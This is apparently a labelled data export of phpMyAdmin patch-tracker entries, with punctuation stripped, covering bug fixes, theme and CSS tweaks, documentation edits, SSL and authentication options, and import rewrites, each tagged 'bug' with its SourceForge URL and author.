No 1 mysqli query ) returned a Query was empty error that is probably a mysqli extension bug) I created a work around for it, by simply testing wether method==MYSQLI STORE RESULT No 2 According to http dev.mysql.com doc mysql en mysql store result.html mysqli store result ought to return a NULL pointer, when the result set is expectedly empty.
I guess that means it should return NULL in PHP, but it doesn t it returns FALSE.
So thats perhaps another mysqli extension bug.
Nevertheless, when my workaround for no 1 was implemented, PMA DBI try query ) returned false, with queries like SET names=utf8; In order to fix this, mysqli field count ) is called, and if 0 is returned the result is set to TRUE.
Original URL https sourceforge.net p phpmyadmin patches 252 https sourceforge.net p phpmyadmin patches 252 Original author pert","bug"
"24444","4197","add links and anchors to every FAQ item.
I added anchors and links to all seven questions of section 4 in the FAQs.
Now, it is pretty easy to copy n paste the link to a proper FAQ item into an IRC help channel in order to point someone into the right direction.
This is way more straight forward than handing out the link to a complete FAQ section with instructions to scroll down to item x.y .
If you like the idea, I can write a second patch which will add those handy anchors links to all and every FAQ item.
Original URL https sourceforge.net p phpmyadmin patches 253 https sourceforge.net p phpmyadmin patches 253 Original author ci dev","bug"
"24444","4198","unset wrong variables.
in libraries mysql charsets.lib.php libraries relation cleanup.lib.php libraries tbl move copy.php are some wrong never created) variables unsetted Original URL https sourceforge.net p phpmyadmin patches 254 https sourceforge.net p phpmyadmin patches 254 Original author cybot tm","bug"
"24444","4199","false positives on not set variables.
ergei ), proc open ), preg match ) uses variables by reference, this causes false postives for unset variables of course this is not a real error, but the mesages for this are annoying this patch prevents reporting this by ading = array ) insdie the function call f.e.
process = proc open program .
.
poptions, descriptorspec, pipes = array )); Original URL https sourceforge.net p phpmyadmin patches 255 https sourceforge.net p phpmyadmin patches 255 Original author cybot tm","bug"
"24444","4200","sqlparser.lib.php code cleanup and var.
init.. sqlparser.lib.php fixed some not set errors and code intend added \ number of brackets in extract = 0; \ number of brackets in group concat = 0; \ first reserved word = ; \ current identifier = ; moved unset clause); to the end of if isset clause) Original URL https sourceforge.net p phpmyadmin patches 256 https sourceforge.net p phpmyadmin patches 256 Original author cybot tm","bug"
"24444","4201","config.inc.php server settings dont add empty servers.
dont add empty servers to cfg array if someone wants to add a second server he just has to uncomment one single line i ; if i is not incremented i uncommented) the server is not added to the cfg array for additonal servers he just has to copy the additonal server section btw.
why are the names for the pma tables not prefilled?
as i noticed this settings are not recognized if pma db is empty.
Original URL https sourceforge.net p phpmyadmin patches 257 https sourceforge.net p phpmyadmin patches 257 Original author cybot tm","bug"
"24444","4202","strPmaUriError should be less forceful.
Right now strPmaUriError is kind of forceful, saying you MUST have PmaAbsoluteUri set.
Seems to me this is outdated, as there is auto detection code that works very well.
The warning should be rephrased, perhaps something like Your PmaAbsoluteUri is not set; please refer to the documentation link) for instructions on how to disable this warning .
I d even go so far as to suggest that PmaAbsoluteUri should be left blank and the warning disabled by default; after all, if the autodetect doesn t work one won t see the warning message anyway, although there may be reasons to leave the warning in that I m not aware of.
Looking for input from the developers, i can submit a patch based on your comments...
Original URL https sourceforge.net p phpmyadmin patches 258 https sourceforge.net p phpmyadmin patches 258 Original author ibennetch","bug"
"24444","4203","rewrote lang detection.
fixed a wrong unset created function bool PMA langCheck ) created function bool PMA langSet string lang ) new language are now checked if valid before set added a hardcoded failover, if all fails added error message if selected lang could not be set and soft failover fails added check for language file before include added error message if file not found added common fatal error page common fatal error page use it with header Location error.php?error= .
urlencode error) ); error.php?error=[string] with optional parameters type with error as default lang with en as default char with utf 8 as default dir with ltr as default Original URL https sourceforge.net p phpmyadmin patches 259 https sourceforge.net p phpmyadmin patches 259 Original author cybot tm","bug"
"24444","4204","dont add params allready in cookies.
i fixed the functions in url generating.lib.php to not add params to url or hidden form fields if this values are already present in cookies Original URL https sourceforge.net p phpmyadmin patches 260 https sourceforge.net p phpmyadmin patches 260 Original author cybot tm","bug"
"24444","4205","serverinfo with quick selectboxes.
add selectbox to serverinfo for fast acces needs serverinfo form \{ display inline; \} in css phpmyadmin.css.php Original URL https sourceforge.net p phpmyadmin patches 264 https sourceforge.net p phpmyadmin patches 264 Original author cybot tm","bug"
"24444","4206","bug 1248577 and bug 1253125. with this patch i add subforms every subform is in form [subform][ID][...] and is available in POST[subform][ID] in grab globals POST is replaced by POST[subform][ID] with ID beeing the key of the first element POST[usesubform] ... but it sound weird, just take a look at the patch Original URL https sourceforge.net p phpmyadmin patches 261 https sourceforge.net p phpmyadmin patches 261 Original author cybot tm","bug"
"24444","4207","move duplicated error pages out of common.lib.php.
replaces generating of error pages by header Location error.php... ) Original URL https sourceforge.net p phpmyadmin patches 262 https sourceforge.net p phpmyadmin patches 262 Original author cybot tm","bug"
"24444","4208","make serverinfo links a input form for quick jump.
if you think it s ugly, just make a input display none, span onclick= display input Original URL https sourceforge.net p phpmyadmin patches 263 https sourceforge.net p phpmyadmin patches 263 Original author xuefer","bug"
"24444","4209","No wrap between icon and text in navtabs.
removes wrapping between icon and text inside the navigation tabs occurs when browser window is too small Original URL https sourceforge.net p phpmyadmin patches 265 https sourceforge.net p phpmyadmin patches 265 Original author cybot tm","bug"
"24444","4210","server status rewritten.
removed list made html more semantic added description to some vars grouped the vars added link to update added link to reset FLASH STATUS) added link to mysql manual section about SHOW STATUS added link FLUSH TABLES added link show open tables) not finished) added colors to performance related statistics green, red) removed styling from html tags reduced output size by 50 even with more content!
Original URL https sourceforge.net p phpmyadmin patches 266 https sourceforge.net p phpmyadmin patches 266 Original author cybot tm","bug"
"24444","4211","Annoying scrolling through multiple databases.
from the forum) When you handle multiple databases phpMyAdmin keeps focus on the ddlb.
Whenever you start scrolling afterwards this results in selecting another database, which is really annoying.
Here is a simple solution to get rid of this problem works at least in IE, FF and NS) I m running version 2.6.0 rc2 locate the file queryframe.php in the folder html.
locate the selectbox lightm db and change the onchange to this onkeydown= getEvent=event.keyCode onmousedown= getEvent=0 onchange= if getEvent==0||getEvent==13) \{ this.form.submit ); if navigator.appName== Microsoft Internet Explorer ) parent.focus ); else blur ); \} May also come in handy when you re creating website with forms ) Original URL https sourceforge.net p phpmyadmin patches 267 https sourceforge.net p phpmyadmin patches 267 Original author lem9","bug"
"24444","4212","Added some PMA DBI functions.
this adds three functions function PMA DBI fetch value result, row = 0, field = 0, link = NULL, options = 0 ) function PMA DBI fetch single row result, type = ASSOC , link = NULL, options = 0 ) function PMA DBI fetch result result = NULL, key = NULL, value = NULL, link = NULL, options = 0 ) documentation is in function doc block Original URL https sourceforge.net p phpmyadmin patches 268 https sourceforge.net p phpmyadmin patches 268 Original author cybot tm","bug"
"24444","4213","New import.
Hi here will be published intermediate patches for my import rewrite.
Basic goals of this rewrite plugin based import system LOAD DATA independent CSV loading time memory limit workarouds default configuration of import stored in config Related RFEs 618255 Import tab 780754 Insert data from textfile page 1017598 importing LOAD DATA statement 1097670 Config Defaults for Insert data from a textfile 1274500 Ignore the first ... lines of a text csv file 807830 Detect that php max execution time will be reached Status of patch version 1 updates will follow) basic plugin framework implemented support for workaround time limits should be imune to memory limits currently only SQL plugin CSV will follow soon, it s just too easy to crash right now) design probably needs to be polished Original URL https sourceforge.net p phpmyadmin patches 269 https sourceforge.net p phpmyadmin patches 269 Original author nijel","bug"
"24444","4214","PMA formatNumber ).
added new function PMA formatNumberDown ), like PMA formatBytesDown ), but with 1000 than 1024 and K than KB aso.
Original URL https sourceforge.net p phpmyadmin patches 270 https sourceforge.net p phpmyadmin patches 270 Original author cybot tm","bug"
"24444","4215","sql tab for server.
adds an sql tab to the server tabs Original URL https sourceforge.net p phpmyadmin patches 271 https sourceforge.net p phpmyadmin patches 271 Original author cybot tm","bug"
"24444","4216","New and faster SQL split dump function.
Hello, for my actual project http www.data butler.de ) I needed to split a large SQL dump into pieces.
I used your function PMA splitSqlFile that worked fine, but is VERY slow and for very large dumps it doesnxc2xb4t work.
So I wrote my own function and I want donate phpMyAdmin in the way that I would be glad if you would use this function instead of PMA splitSqlFile.
The function strips single and multiline comments outside a SQL statement.
I tested it with multiline textfields that contained comments and SQL statements.
I could not find any error.
In comparison with PMA splitSqlFile my function is much faster.
A 7,2MB File with 25000 SQL statements was splitted in 35secs.
PMA splitSqlFile took nearly 10 minutes.
Use of this function content = file get contents file); splitSQLDump content); print r content); See attached file.
Original URL https sourceforge.net p phpmyadmin patches 272 https sourceforge.net p phpmyadmin patches 272 Original author maestro gregor","bug"
"24444","4217","do not add a blank before .
do not add before from the MySQL manual Note By default, there must be no whitespace between a function name and the parenthesis following it.
This helps the MySQL parser distinguish between function calls and references to tables or columns that happen to have the same name as a function.
Spaces around function arguments are permitted, though.
fixes bugs [ 1283273 ] support of area ) function https sourceforge.net tracker index.php?func=detail aid=1283273 group id=23067 atid=377408 [ 1255600 ] weird MySQL syntax error http sourceforge.net tracker index.php?func=detail aid=1255600 group id=23067 atid=377408 [ 1240939 ] UPPER ) https sourceforge.net tracker index.php?func=detail aid=1240939 group id=23067 atid=377408 Original URL https sourceforge.net p phpmyadmin patches 273 https sourceforge.net p phpmyadmin patches 273 Original author cybot tm","bug"
"24444","4218","`0` as db or table name.
Hallo, with phpMyAdmin you can not create or work with a table database with the name `0`.
Because, the most time you compare the names with empty ).
With the attached patch this should work then.
I changed empty ) with a check against strlen ).
I will hope I have found all occurrences... BTW Somtimes found this in the code | 0 is empty in PHP | if !empty foo) || foo == 0 ) \{ IMHO you can change that code also to this one | if 0 lt; strlen foo)) \{ Best regards.
Carsten Wiedmann Original URL https sourceforge.net p phpmyadmin patches 278 https sourceforge.net p phpmyadmin patches 278 Original author c wiedmann","bug"
"24444","4219","Respect chosen initial.
Current server privileges.php in HEAD no longer respects the chosen initial for username.
Original URL https sourceforge.net p phpmyadmin patches 279 https sourceforge.net p phpmyadmin patches 279 Original author lem9","bug"
"24444","4220","queryframe.php bug 1281262 and code cleanup.
this is a fix for bug [ 1281262 ] grouping database with doesn t aways work https sourceforge.net tracker index.php?func=detail aid=1281262 group id=23067 atid=377408 also unused code is removed removed some double checks added tool tip title) to option tags Original URL https sourceforge.net p phpmyadmin patches 274 https sourceforge.net p phpmyadmin patches 274 Original author cybot tm","bug"
"24444","4221","disadvantageously size of query window.
bug [ 1277375 ] disadvantageously size of query window Original URL https sourceforge.net p phpmyadmin patches 275 https sourceforge.net p phpmyadmin patches 275 Original author cybot tm","bug"
"24444","4222","XHTML compliance.
pls test!
XHTML complinace at least index and left.php) less JavaScript supports url params for index.php Original URL https sourceforge.net p phpmyadmin patches 276 https sourceforge.net p phpmyadmin patches 276 Original author cybot tm","bug"
"24444","4223","use number format ) for displaying row counts.
the attached uses numebr format ) for displaying row counts as tooltips in left.php and for the total number of rows in a set while browsing.
makes working with huge tables slightly easier.
Original URL https sourceforge.net p phpmyadmin patches 277 https sourceforge.net p phpmyadmin patches 277 Original author iamcal","bug"
"24444","4224","doc fix PmaAbsoluteUri with Port Forwarding.
This is really minor, but should be documented so here you go.
PmaAbsoluteUri may need to be set if port forwarding is used.
See this for more info https sourceforge.net tracker index.php?func=detail aid=1340187 group id=23067 atid=377409 Documentation.html note on using PmaAbsoluteUri when port forwarding Original URL https sourceforge.net p phpmyadmin patches 280 https sourceforge.net p phpmyadmin patches 280 Original author ibennetch","bug"
"24444","4225","improvements to Documentation.html.
Here s a couple of changes to Documentation.html spelling corrections improved spacing and formatting of configuration items removed the extra and un needed lt;br gt; lt;br gt; at the end of some lt;dt gt;s if the extra space is desired, a changed can easily be made to docs.css to affect all lt;dt gt; items).
improved wording of some items, updated information about the new import engine.
fix a missing lt; li gt; Note that, while this is patched against 2.171, Marc made a changed to 2.172 duplicating one of the changes I made adding amp;amp; instead of in a URL for XHTML compliance.
Unfortunately, his patch broke the URL by I think deleting a ?
in the query string.
Anyway, this attachment has the correct URL.
Original URL https sourceforge.net p phpmyadmin patches 281 https sourceforge.net p phpmyadmin patches 281 Original author ibennetch","bug"
"24444","4226","Externalize authentication to HTTP server.
When HTTP authentication is used in phpMyAdmin installed as part of a larger) site that is already strongly authenticating a user to an external server Kerberos, LDAP, etc), there can be conflicts between the external password and the MySQL password.
The goal here is to avoid changing passwords both in external authentication server and in MySQL; i.e.
not to use MySQL password MySQL security is left to other external means).
Since MySQL does not allow wildcards in passwords, the only workaround is to define blank passwords for MySQL users connecting though PMA.
PMA must then try to mysql connect with a null password when the HTTP password fails.
This patch implements this feature, controlled by a per server switch cfg[ Servers ][ i][ try null password ] This switch is disabled FALSE) in config.default.php The superiority of this method compared to the config method) resides in keeping the per user DB access permissions, without needing cookies and double login.
The drawback is the need of strong external protection.
This patch works for me, but grouping it as needs serious tests instead of immediate release is only justified by the risk of introducing security holes in database access.
Original URL https sourceforge.net p phpmyadmin patches 283 https sourceforge.net p phpmyadmin patches 283 Original author monnerat","bug"
"24444","4227","Apache PHP CGI http authentication.
Hello, Hereby I would like to post a message about a small patch I wrote which makes HTTP authentication mode work when running php as cgi under Apache.
I succesfully tested it with phpmyadmin version 2.6.3 pl1 and 2.7.0.
Kind regards, Marcel Hamer Original URL https sourceforge.net p phpmyadmin patches 282 https sourceforge.net p phpmyadmin patches 282 Original author hammerhd","bug"
"24444","4228","RPM spec file and Apache config file for FC4.
The attached files allow to prepare a ready to install RPM package for Fedora core 4.
Copy phpMyAdmin.spec in usr src redhat SPECS Copy phpMyAdmin 2.7.0 pl1.tar.bz2 and phpMyAdmin http.conf in usr src redhat SOURCES Do a rpmbuild ba usr src redhat SPECS phpMyAdmin.spec The package is left in usr src redhat RPMS noarch phpMaAdmin 2.7.0 pl1.0.noarch.rpm Install it with rpm Uvh \ usr src redhat RPMS noarch phpMaAdmin 2.7.0 pl1.0.noarch.rpm Original URL https sourceforge.net p phpmyadmin patches 284 https sourceforge.net p phpmyadmin patches 284 Original author monnerat","bug"
"24444","4229","blank page bugfix.
The following patch fix the blank page bug that appear when the PHP session.save handler is set to a value different than files .
file to change libraries session.inc.php the folowing original lines start the session on some servers for example, sourceforge.net), we get a permission error on the session data directory, so I add some session name phpMyAdmin ); session start ); must be replaced with start the session [2006 01 25] Nicola Asuni www.tecnick.com the following line was added and the were removed ini set session.save handler , files ); session name phpMyAdmin ); session start ); Additional explanation If your PHP is set to use session.save handler = user the session start fail and raise an exception that could not be displayed due to the .
The result is a blank page without information.
Original URL https sourceforge.net p phpmyadmin patches 288 https sourceforge.net p phpmyadmin patches 288 Original author nicolaasuni","bug"
"24444","4230","Typo en Config.class.php in checkUpload ) latest CVS ver.).
There is a typo in function checkUpload ) in Config.class.php, the config key enable upload is set as enbale upload I think this is used only in backward compatibility) Luis Original URL https sourceforge.net p phpmyadmin patches 285 https sourceforge.net p phpmyadmin patches 285 Original author normannormal","bug"
"24444","4231","Patch for IBM AIX version of libiconv.a iconv ).
The IBM AIX version of the iconv library libiconv.a) has a different naming convention for character sets, causing traditional iconv ) calls to fail.
For example, iso 8859 1 is called ISO8859 1 on AIX, and utf 8 must be called UTF 8 .
This affects the export import feature of phpMyAdmin.
Supplying patches original files, new files and unified diffs) against 2.8.0 beta1 for libraries charset conversion.lib.php and libraries database interface.lib.php, as well as the new libraries iconv wrapper.lib.php, which acts as a wrapper around iconv ) and makes it possible and easy!)
to handle special cases such as IBM AIX.
Hoping that you will consider integrating this into future releases of phpMyAdmin!
Many thanks in advance!
Best regards, Bjxc3xb6rn Wiberg Uppsala university IT Support Department Original URL https sourceforge.net p phpmyadmin patches 289 https sourceforge.net p phpmyadmin patches 289 Original author bwiberg","bug"
"24444","4232","URL Encoding in server status.php.
A URL is generated in server status.php which does not have proper URL encoding lt;a href= ?flush=QUERY CACHE amp;amp; gt;Flush query cache lt; a gt; adjust to lt;a href= ?flush=QUERY 20CACHE amp;amp; gt;Flush query cache lt; a gt; Patch attached.
Original URL https sourceforge.net p phpmyadmin patches 286 https sourceforge.net p phpmyadmin patches 286 Original author cyberdog3k","bug"
"24444","4233","auto increment glitch in 2.6.4 pl4.
Just in case anybody cares... modify file tbl properties table info.php aproximately at line 57 change auto increment = isset showtable[ Auto increment ]) ?
showtable[ Auto increment ] ); to Hack to avoid auto increment being clobered if !isset submitoptions)) \{ auto increment = isset showtable[ Auto increment ]) ?
showtable[ Auto increment ] ); \} Original URL https sourceforge.net p phpmyadmin patches 287 https sourceforge.net p phpmyadmin patches 287 Original author mebejeb","bug"
"24444","4234","Tool for adding removing prefixes of all tables in DB.
Here s a briefly tested addition to the DB operations tab.
It s a tool for adding or removing prefixes of table names.
Having prefixes in the names is common, and it s frustrating to manually rename all tables in a database.
This makes it in a flash.
The script gets a list of tables in the currently selected database and uses PMA s rename method to add the prefix.
When removing prefixes, the code first checks that the prefix exists and then renames the table to the shortened substring.
Original and changed files, as well as diffs are included.
Original URL https sourceforge.net p phpmyadmin patches 290 https sourceforge.net p phpmyadmin patches 290 Original author visa","bug"
"24444","4235","Triming invisible characters when loading config.
Very simple Patch which allows editing config.inc.php to be more easy, user friendly, less errornous.
Many poeple like me )) experience problem with additional blank lines or spaces) befor lt;?
and after ?
gt; in config.inc.php, which generates then a few lines of error messages.
Those messages do not tell what is the possible source of the problem.
After reading project FAQ a I found that it might be problem with additional unvisible characters beyond PHP markers.
So a decided to clean read config file using trim command.
Below is unified diff.
diff u common.lib.php.org common.lib.php common.lib.php.org 2006 02 14 15 57 23.000000000 0100 common.lib.php 2006 02 14 15 57 06.000000000 0100 97,7 97,7 We can not use include as it fails on parse error if file exists .
config.inc.php )) \{ config fd = fopen .
config.inc.php , r ); result = eval ?
gt; .
fread config fd, filesize .
config.inc.php ))); \ result = eval ?
gt; .
trim fread config fd, filesize .
config.inc.php )))); fclose config fd ); unset config fd ); Original URL https sourceforge.net p phpmyadmin patches 293 https sourceforge.net p phpmyadmin patches 293 Original author piotr skowronek","bug"
"24444","4236","patch to bug 1406378. according to mysql documentaiton, an auto increment row cannot have default value.
test with mysql version 3.23.58 and 4.1.13 passed.
Original URL https sourceforge.net p phpmyadmin patches 291 https sourceforge.net p phpmyadmin patches 291 Original author nyvsld","bug"
"24444","4237","SQL Import problem of non UTF8 PMA substr ) ?.
There is problem with using a direct string buffer call like this buffer[ i].
When using internal coding, utf 8 buffer can contain double chars, which direct accees interprets like two chrars.
I replaced each occurence with something like substr buffer, i,1) to solve it.
Original URL https sourceforge.net p phpmyadmin patches 292 https sourceforge.net p phpmyadmin patches 292 Original author chmel","bug"
"24444","4238","HTML Validation in Setup.php.
Hi all...did a quick XHTML validation on the new setup.php in RC1.
This patch fixes two issues First, there were instances were GET and POST were capitalized in a form once each).
XHTML uses lowercase only, capitalization in XML would be a different element and is therefore invalid.
Reference http www.w3.org TR xhtml1 h 4.2 Second, most of the lt;form gt; elements were missing the action element.
Action is a required form element, I simply included empty actions to produce the same effect as would be expected from leaving it out.
Reference http www.w3.org TR html4 interact forms.html edef FORM Patch is attached.
Original URL https sourceforge.net p phpmyadmin patches 294 https sourceforge.net p phpmyadmin patches 294 Original author cyberdog3k","bug"
"24444","4239","Original Theme with fonts under control for phpMyAdmin 2.8.
Here s the Original theme where the fonts issue is under control of the css, and not the browser, thus avoiding the user to change the settings for viewing phpMyAdmin and then changing them back to view the rest of the internet Original URL https sourceforge.net p phpmyadmin patches 295 https sourceforge.net p phpmyadmin patches 295 Original author technomike","bug"
"24444","4240","Move code in select server.lib.php.
In library select server.lib.php Change ========== if not only options) \{ echo lt; select gt; ; if ommit fieldset) \{ echo lt;hr gt; ; \} else \{ echo lt; fieldset gt; ; \} ?
gt; lt;input type= hidden name= lang value= lt;?php echo lang; ?
gt; gt; lt;input type= hidden name= convcharset value= lt;?php echo convcharset; ?
gt; gt; lt;?php Show submit button if we have just one server this happens with no default) echo lt;noscript gt; ; echo lt;input type= submit value= .
GLOBALS[ strGo ] .
gt; ; echo lt; noscript gt; ; echo lt; form gt; ; \} elseif list) \{ TODO FIXME display server list as list echo lt; ol gt; ; \} ========== To ========== if not only options) \{ echo lt; select gt; ; ?
gt; lt;input type= hidden name= lang value= lt;?php echo lang; ?
gt; gt; lt;input type= hidden name= convcharset value= lt;?php echo convcharset; ?
gt; gt; lt;?php Show submit button if we have just one server this happens with no default) echo lt;noscript gt; ; echo lt;input type= submit value= .
GLOBALS[ strGo ] .
gt; ; echo lt; noscript gt; ; echo lt; form gt; ; if ommit fieldset) \{ echo lt;hr gt; ; \} else \{ echo lt; fieldset gt; ; \} \} elseif list) \{ TODO FIXME display server list as list echo lt; ol gt; ; \} ========== Otherwise, when JavaScript is disabled the Go button appears below the HR or fieldset instead of next to or wrapped underneath) the select box.
Original URL https sourceforge.net p phpmyadmin patches 298 https sourceforge.net p phpmyadmin patches 298 Original author xangelusx","bug"
"24444","4241","Typo in config.inc.php.
Hi, thanks fot the great app ) Not sure if this is the right place, so...
I was browsing the config file and noticed that ForceSSL was mistyped as ForceSLL Original URL https sourceforge.net p phpmyadmin patches 296 https sourceforge.net p phpmyadmin patches 296 Original author cola4ever","bug"
"24444","4242","Add ssl support to mysqli connection.
Hello, I ve created a patch against phpmyadmin 2.7.0 pl1 to use ssl for connecting to mysql server.
This is for the mysqli part of phpmyadmin.
If I ve got time, I will try to do the same for the mysql part.
Maybe there is a better method of adding ssl support, but it works for me and I m needing it.
HTH, Steffen Original URL https sourceforge.net p phpmyadmin patches 297 https sourceforge.net p phpmyadmin patches 297 Original author steffen zieger","bug"
"24444","4243","Documentation improvments details below).
A few improvements to Documentation.html, mostly consisting of 1) Fixing grammar errors and improving sentence structure and 2) Adding numbers to FAQ entries making it much easier to actually refer users to the proper FAQs) Thanks as always, feedback is welcome...
Original URL https sourceforge.net p phpmyadmin patches 299 https sourceforge.net p phpmyadmin patches 299 Original author ibennetch","bug"
"24444","4244","Catch permission denied on SHOW DATABASES.
Some hosting services do not disable the SHOW DATABASE query as they use it) but do not gives the corrsponding priviledge to normal users.
In this case phpMyAdmin refuse to use the database listed in only db, even if in fact it can be handled perfectly.
It is for example the case for one of the leading web host company in france, OVH www.ovh.com).
When you create a database, you get a user name and a password which are only valid for this database, and do NOT allow you to list the databases hosted on the same server there may be hundreds of these...) To solve this we only have to check for which reason we can t access the database list and accept the permission denied case as we already accept the show database disable case.
This is exactly what does the small patch below that I already use to manage my databases).
Original URL https sourceforge.net p phpmyadmin patches 300 https sourceforge.net p phpmyadmin patches 300 Original author b dautrevaux","bug"
"24444","4245","MySQL version specific comments.
MySQL supports conditional comments of the form !
MySQL only !12345 MySQL 1.23.45 only See http dev.mysql.com doc refman 5.0 en comments.html Yet, the import script unconditionally removes all comments.
This is bad, because the command line mysqldump utility will often use these conditional comments to maximize compatibility with older MySQL versions.
The attached patch fixes this by parsing the comments in libraries import sql.php.
Normal comments and comments for newer MySQL versions are removed, comments for older MySQL versions are de commented.
Original URL https sourceforge.net p phpmyadmin patches 301 https sourceforge.net p phpmyadmin patches 301 Original author unconed","bug"
"24444","4246","URL parsing fails on paths containing foo ).
I have phpMyAdmin running on Apache 2 and PHP 5.1.2, in a directory similar to foobar , so the URL is https example.com foobar PMA first tries parse url ) with the SERVER[ REQUEST URI ] superglobal, but this fails for foo , produces E WARNING and returns false.
The result is a defect PmaAbsoluteUrl redirect target of https example.com.
index.php note the missing path and the extra dot at the end of the host part.
Attached is a patch that fixes against the CVS STABLE tag.
I ve not thoroughly tested it and left uses of parse url ) untouched, that should never get reached in this case.
Original URL https sourceforge.net p phpmyadmin patches 302 https sourceforge.net p phpmyadmin patches 302 Original author blueyed","bug"
"24444","4247","CSS fixes darkblue orange arctic ocean.
I d like to submit fixes for two typos in color definitions in darkblue orange and arctic ocean.
And here they are.
Original URL https sourceforge.net p phpmyadmin patches 304 https sourceforge.net p phpmyadmin patches 304 Original author ryandesign","bug"
"24444","4248","Only checks for windows or unix.
Currently only checks WebServerOs for either unix like or windows.
Proposed change in attached txt file.
This allows additional checking for other OS s without unix like file permissions.
Original URL https sourceforge.net p phpmyadmin patches 303 https sourceforge.net p phpmyadmin patches 303 Original author rgehrig","bug"
"24444","4249","OldStyle for pma 2.7 , 2.8.2. here is a fixed version of orignal theme.
IE now working with font size 1em similar appearance in IE,Opera and Gecko browsers FF..) vertical line separator Original URL https sourceforge.net p phpmyadmin patches 307 https sourceforge.net p phpmyadmin patches 307 Original author windkiel","bug"
"24444","4250","docs better explaining hide db.
Sure, users should reference the PHP PCRE manual or Google if they don t understand how to use regex, but this nudges them in the right direction.
Provides two examples which should fix most use cases, adds a link to the PHP manual, and is less ambiguous about how to restrict access using MySQL privileges.
Original URL https sourceforge.net p phpmyadmin patches 305 https sourceforge.net p phpmyadmin patches 305 Original author ibennetch","bug"
"24444","4251","original theme CSS font size fix.
I don t know but after a certain version of phpMyAdmin, some fonts are too big in MSIE 6.0 with normal font size settings, other users report that too.
Please look and test it.
Thanks Original URL https sourceforge.net p phpmyadmin patches 306 https sourceforge.net p phpmyadmin patches 306 Original author ketas","bug"
"24444","4252","fixed original pma 2.7, 2.8).
As i m not familiar with that diff thing, i uploaded a fixed original theme HEAD) to themes.
see Bugs item 1452131) Just my 2 cents.
Original URL https sourceforge.net p phpmyadmin patches 308 https sourceforge.net p phpmyadmin patches 308 Original author windkiel","bug"
"24444","4253","avoiding unnecessary disc access header.inc.php).
Id header.inc.php,v 2.13 2006 06 02 15 00 29 lem9 Exp line 141 Include possible custom headers require once .
libraries header custom.inc.php ; \ if file exists .
config.header.inc.php )) require .
config.header.inc.php ); results in one less disk access on every page and header custom.inc.php is no longer necessary Original URL https sourceforge.net p phpmyadmin patches 309 https sourceforge.net p phpmyadmin patches 309 Original author windkiel","bug"
"24444","4254","darkblue orange CVS now readable ).
the patches only work together) themes darkblue orange layout.inc.php line 38 \ GLOBALS[ cfg ][ LeftBgColor ] = dd5522 ; li.marked background makes selected table white on darkorange) line 59 GLOBALS[ cfg ][ FontSize ] = 8pt ; \ GLOBALS[ cfg ][ FontSize ] = .8em ; themes darkblue orange css themes right.css.php line 11 \ font size 100.01 ; IE Safari bugfix line 18 body, table, tbody, tr, td \{ \ body, select, input \{ font size lt;?php echo GLOBALS[ cfg ][ FontSize ]; ?
gt;; \} line 21 select, input, textarea \{ font size 0.7em; \ select, input, textarea \{ \ font size 110 ; line 31 \ background image url .. lt;?php echo GLOBALS[ pmaThemeImage ]; ?
gt;vertical line.png); \ background repeat repeat y; themes original css themes left.css.php same as above , except line31 ) plus line 64 div pmalogo, div leftframelinks, div databaseList \{ text align center; border bottom 0.05em solid lt;?php echo GLOBALS[ cfg ][ NaviColor ]; ?
gt;; margin bottom 0.5em; padding bottom 0.5em; \} \ div pmalogo, \ div databaseList \{ \ text align center; \} only important, if cfg[ LeftDisplayServers ]==true , just cosmetic ) Original URL https sourceforge.net p phpmyadmin patches 310 https sourceforge.net p phpmyadmin patches 310 Original author windkiel","bug"
"24444","4255","outdated security comments in docs.
there are some comments from 2003 4 referring to pma 2.5 in the docs.
I think a link to the uptodate http www.phpmyadmin.net home page security.php should be sufficient.
Original URL https sourceforge.net p phpmyadmin patches 313 https sourceforge.net p phpmyadmin patches 313 Original author windkiel","bug"
"24444","4256","js error in footer.inc.php.
to avoid js console popping up with warnings ...id not defined...) libraries footer.inc.php line 73 if window.parent.frames[1].name != frame content ) \{ \ if window.parent.frames[1].name) window.parent.frames[1].name != frame content )) \{ line 76 if window.parent.frames[1].id != frame content ) \{ \ if window.parent.frames[1].id) window.parent.frames[1].id != frame content )) \{ Original URL https sourceforge.net p phpmyadmin patches 311 https sourceforge.net p phpmyadmin patches 311 Original author windkiel","bug"
"24444","4257","layout.inc bugfix.
in themes original layout.inc.php to restore the good old vertical line as handle for dragging the frame border background for the main frame GLOBALS[ cfg ][ MainBackground ] = F5F5F5 url .. .
SESSION[ PMA Theme ] gt;getImgPath ) .
vertical line.png) repeat y ; line 30) Original URL https sourceforge.net p phpmyadmin patches 314 https sourceforge.net p phpmyadmin patches 314 Original author windkiel","bug"
"24444","4258","SSL support for MySQL connections.
Enables optional) SSL support for MySQL connections.
Tested to work with MySQL 4.1.20 and PHP 4.3.11.
Support for SSL connections in MySQL is basically just another flag passed to mysql driver, just like compression.
My patch add the flag, defaulted to false, documents it, and adds suport to setup.php Original URL https sourceforge.net p phpmyadmin patches 312 https sourceforge.net p phpmyadmin patches 312 Original author haimg","bug"
"24444","4259","Fix konqueror layout font and button size and align).
Hi, There is an old and anoying bug in the default theme of phpMyAdmin under konqueror that mess up the rendering.
Plz apply that patch to fix the rendering under konqueror.
It fix the misplacement of input element cause under konqueror they are display block instead of inline under FF IE).
It fix the problem of size of font that made it impossible to realy use in small resolution 1024x768 or 800x600.
I take care of check it didn t change the rendering under FF and IE) Plz apply ;) Original URL https sourceforge.net p phpmyadmin patches 315 https sourceforge.net p phpmyadmin patches 315 Original author rapsys","bug"
"24444","4260","single sign on from another PHP session.
I have a page say foobar.de ) with a PHP session based login.
From that page, I want to link to phpMyAdmin without the need to login to phpMyAdmin separately.
I want phpMyAdmin to use the login data from my existing PHP session.
The good thing about this feature request I already implemented it by changing config.inc.php) you simply have to grab the code ; ) I ll attach a file describing the changes I have done.
Original URL https sourceforge.net p phpmyadmin patches 316 https sourceforge.net p phpmyadmin patches 316 Original author christian boltz","bug"
"24444","4261","More Documentation.html changes.
See the attached .diff for these changes \ added note suggesting WAMP and XAMPP \ added note about users pma does no user managment) re wrote the configuration step of quickstart includes moving setup script usage to quickstart section rather than it s own section too much information was spread across too many sections, leading to duplication and information missing from one section.
It s all consolidated now).
\ add upgrade note about updating pmadb structure I think that s it.
As always, let me know if you have any comments.
Thanks!
Original URL https sourceforge.net p phpmyadmin patches 317 https sourceforge.net p phpmyadmin patches 317 Original author ibennetch","bug"
"24444","4262","Highlighting in Navi not working in IE6.
IE obviously doesn t understand color inherit and many people are still using IE) [tested on pma.cihar.com and locally] so in themes original css theme left.css.php line 95 color inherit ; \ color lt;?php echo GLOBALS[ cfg ][ NaviColor ]; ?
